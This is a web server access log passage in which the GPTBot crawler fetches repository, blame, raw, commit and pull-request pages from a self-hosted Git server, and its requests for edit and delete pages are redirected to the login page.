+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12658] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 11706] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11778] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11429] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" -[17/Feb/2026:17:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" -[17/Feb/2026:17:24:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" -[17/Feb/2026:17:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11664] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" -[17/Feb/2026:17:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19512] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19513] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19485] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15606] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:17:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild" [Client 74.7.227.38] [Length 142693] [Gzip 13.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:17:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 102507] [Gzip 10.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2f.vscode" [Client 74.7.227.38] [Length 25974] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" -[17/Feb/2026:17:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 37773] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fmain.cpp" [Client 74.7.227.38] [Length 25216] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild" [Client 74.7.227.38] [Length 131152] [Gzip 14.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 